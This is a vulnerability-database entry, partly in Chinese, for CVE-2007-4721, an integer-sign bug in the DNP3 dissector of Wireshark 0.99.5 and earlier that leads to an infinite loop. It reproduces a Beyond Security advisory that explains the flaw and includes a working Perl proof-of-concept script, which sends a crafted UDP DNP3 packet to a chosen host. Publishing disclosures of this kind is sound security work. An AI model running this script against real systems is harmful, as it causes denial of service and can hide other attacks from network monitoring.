Wireshark 数字错误漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189239 漏洞类型 数字错误
发布时间 2007-09-05 更新时间 2007-09-10
CVE编号 CVE-2007-4721 CNNVD-ID CNNVD-200709-031
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007090015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-031
|漏洞详情
Wireshark0.99.5版本及其早期版本的DNP3dissector中存在整数值符号错误,远程攻击者可以借助某个DNP3信息包,造成拒绝服务(死循环)。
|漏洞EXP
A vulnerability in Wireshark's DNP3 dissector allows attackers to cause it 
to enter an infinite loop which in turn can be used to mask other types of 
attacks from being captured by Wireshark.

DETAILS

Vulnerable Systems:
 * Wireshark version 0.99.5 and prior

Immune Systems:
 * Wireshark version 0.99.6 and newer

A vulnerability in the way Wireshark handles DNP3 data allows an attacker 
to fool the dissector into thinking a negative value of items has been 
provided to it as part of the Application Layer's request to read/write 
objects. This in turn causes the loop found in the code:
for (temp16 = 0; temp16 < num_items; temp16++)
{

To enter into an infinite loop as the temp16 parameter is defined as an 
unsigned int of a length of 16 bits while the num_items is defined as an 
unsigned int of a length of 32 bits - which in turn means than a negative 
value will be casted into a larger than 16 bits value - as the temp16 will 
not be able to reach the value stored in the num_items parameter.

Proof of Concept:
The vulnerability can be recreated by either using  
beSTORM (http://www.beyondsecurity.com/bestorm_overview.html) with the 
DNP3 protocol fuzzer and monitoring the traffic generated with Wireshark 
or by launching the following exploit code:
#!/usr/bin/perl
# Automatically generated by beSTORM(tm)
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)

# Attack vector:
# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0

# Module:
#  DNP3

use strict;
use warnings;

use Getopt::Std;
use IO::Socket::INET;

$SIG{INT}  = \&abort;

my $host  = '192.168.4.52';
my $port  = 20000;
my $proto = 'udp';
my $sockType = SOCK_DGRAM;
my $timeout = 1;

#Read command line arguments
my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );

if (defined $opt{h}) {
    usage()
}

$host    = $opt{H} ? $opt{H} : $host;
$port    = $opt{P} ? $opt{P} : $port;
$timeout = $opt{t} ? $opt{t} : $timeout;

my @commands = (
{Command => 'Send',
 Data => 
"\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08},
{Command => 'Receive'},

);

###
# End user configurable part
###

#1. Create a new connection
my $sock = new IO::Socket::INET (
                PeerAddr => $host,
    PeerPort => $port,
    Proto => $proto,
                Type => $sockType,
                Timeout => $timeout,
            )
    or die "socket error: $!\n\n";

print "connected to: $host:$port\n";

$sock->autoflush(1);
binmode $sock;

#2. communication part

foreach my $command (@commands)
{
    if ($command->{'Command'} eq 'Receive')
    {
        my $buf = receive($sock, $timeout);
        if (length $buf)
        {
            print "received: [$buf]\n";
        }
    }
    elsif ($command->{'Command'} eq 'Send')
    {
        print "sending: [".$command->{'Data'}."]\n";
        send ($sock, $command->{'Data'}, 0) or die "send failed, reason: 
$!\n";
    }
}

#3. Close connection
close ($sock);

#The end

sub receive
{
 my $sock = shift;
 my $timeout = shift;

my $tmpbuf;
 my $buf = "";

while(1)
 { # Example from perldoc -f alarm
  eval {
    local $SIG{ALRM} = sub { die "timeout\n" };
    alarm $timeout;

my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time.
    if ( !defined $ret or $ret == 0 )
    { #EOF
        die "timeout\n";
    }

alarm 0;
    $buf .= $tmpbuf;
  };
  if ($@) { #time out
    if($@ eq "timeout\n")
    {
        last;
    }
    else {
        die "receive aborted\n";
    }
  }
 } #while
 return $buf;
}

sub abort
{
    print "aborting...\n";
    if ($sock)
    {
        close $sock;
    }
    die "User aborted operation\n";
}
sub usage
{
 print "usage: $0 [-hHPt]\n";
 print "-h\t: this help message\n";
 print "-H\t: override default host - $host\n";
 print "-P\t: override default port - $port\n";
 print "-t\t: set socket timeout in seconds\n";
 exit 0;
}

ADDITIONAL INFORMATION

The information has been provided by beSTORM.
More information can be found at:  
<http://www.beyondsecurity.com/bestorm_overview.html> 
http://www.beyondsecurity.com/bestorm_overview.html

-- 
Regards,
Aviram Jenik
Beyond Security

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

Looking for Unknown Vulnerabilities?
http://beyondsecurity.com/beSTORM